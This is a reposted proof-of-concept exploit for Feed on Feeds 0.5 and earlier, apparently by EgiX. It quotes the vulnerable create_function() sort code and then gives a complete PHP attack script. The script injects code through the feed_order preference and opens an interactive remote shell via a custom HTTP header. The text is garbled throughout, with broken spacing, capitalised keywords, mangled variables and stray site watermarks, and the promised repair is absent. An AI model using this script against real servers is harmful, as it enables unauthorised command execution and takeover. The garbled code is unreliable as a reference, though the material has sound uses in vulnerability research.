Feed on Feeds & lt; = 0.5 remote code injection defects and repair

 

<? Php

 

/*

------------------------------------------------------

Feed on Feeds <= 0.5 Remote PHP Code Injection Exploit

------------------------------------------------------

Author ......: EgiX

Mail ......: n0b0d13s [at] gmail [dot] com www.2cto.com

Software link...: http://feedonfeeds.com/or http://code.google.com/p/feed-on-feeds/

 

This PoC was written for educational purpose. Use it at your own risk.

Author will be not responsible for any damage.

[-] Vulnerable code in/fof-main.php

 

1091. function fof_multi_sort ($ tab, $ key, $ rev)

1092 .{

1093. if ($ rev)

1094 .{

1095. $ compare = create_function ('$ a, $ B', 'If (strtolower ($ ["'. $ key. '"]) = strtolower ($ B ["'. $ key. '"]) {return 0;} else {return (strtolower ($ ["'. $ key. '"])> strtolower ($ B ["'. $ key. '"])? -1: 1 ;}');

1096 .}

1097. else

1098 .{

1099. $ compare = create_function ('$ a, $ B', 'If (strtolower ($ ["'. $ key. '"]) = strtolower ($ B ["'. $ key. '"]) {return 0;} else {return (strtolower ($ ["'. $ key. '"]) <strtolower ($ B ["'. $ key. '"])? -1: 1 ;}');

1100 .}

1101.

1102. usort ($ tab, $ compare );

1103. return $ tab;

1104 .}

The $ key parameter passed to fof_multi_sort () function isn' t properly sanitized before being used in a call

To "create_function ()" at line 1095 or 1099. This can be exploited to inject and execute arbitrary PHP code.

Successful exploitation of this vulnerability requires authentication.

*/

 

Error_reporting (0 );

Set_time_limit (0 );

Ini_set ("default_socket_timeout", 5 );

 

Function http_send ($ host, $ packet)

{

If (! ($ Sock = fsockopen ($ host, 80 )))

Die ("\ n [-] No response from {$ host}: 80 \ n ");

Fwrite ($ sock, $ packet );

Return stream_get_contents ($ sock );

}

 

Function inject_php ()

{

Global $ host, $ path, $ user, $ pass;

$ Data = "feed_order = \"]);} print ('<'); passthru (base64_decode (\ $ _ SERVER [HTTP_CMD]); print ('>'); % 23 ";

$ Packet = "POST {$ path} set-prefs.php HTTP/1.0 \ r \ n ";

$ Packet. = "Host: {$ host} \ r \ n ";

$ Packet. = "Cookie: user_name = {$ user}; user_password_hash = {$ pass} \ r \ n ";

$ Packet. = "Content-Length:". strlen ($ data). "\ r \ n ";

$ Packet. = "Content-Type: application/x-www-form-urlencoded \ r \ n ";

$ Packet. = "Connection: close \ r \ n ";

$ Packet. = $ data;

If (preg_match ("/login. php/", http_send ($ host, $ packet) die ("\ n [-] Incorrect username or password! \ N ");

}

 

Print "\ n + ---------------------------------------------------------------- + ";

Print "\ n | Feed on Feeds <= 0.5 Remote PHP Code Injection Exploit by EgiX | ";

Print "\ n + ---------------------------------------------------------------- + \ n ";

 

If ($ argc <5) www.2cto.com

{

Print "\ nUsage...: php $ argv [0]

Print "\ nExample...: php $ argv [0] localhost/user pass ";

Print "\ nExample...: php $ argv [0] localhost/fof/user pass \ n ";

Die ();

}

 

$ Host = $ argv [1];

$ Path = $ argv [2];

$ User = $ argv [3];

$ Pass = md5 ($ argv [4]. $ user );

 

Inject_php ();

 

$ Packet = "GET {$ path} sidebar. php HTTP/1.0 \ r \ n ";

$ Packet. = "Host: {$ host} \ r \ n ";

$ Packet. = "Cookie: user_name = {$ user}; user_password_hash = {$ pass} \ r \ n ";

$ Packet. = "Cmd: % s \ r \ n ";

$ Packet. = "Connection: close \ r \ n ";

 

While (1)

{

Print "\ nfof-shell #";

If ($ cmd = trim (fgets (STDIN) = "exit") break;

Preg_match ("/<(. *)>/s", http_send ($ host, sprintf ($ packet, base64_encode ($ cmd), $ m )? Print $ m [1]: die ("\ n [-] Exploit failed! \ N ");

}

 

?>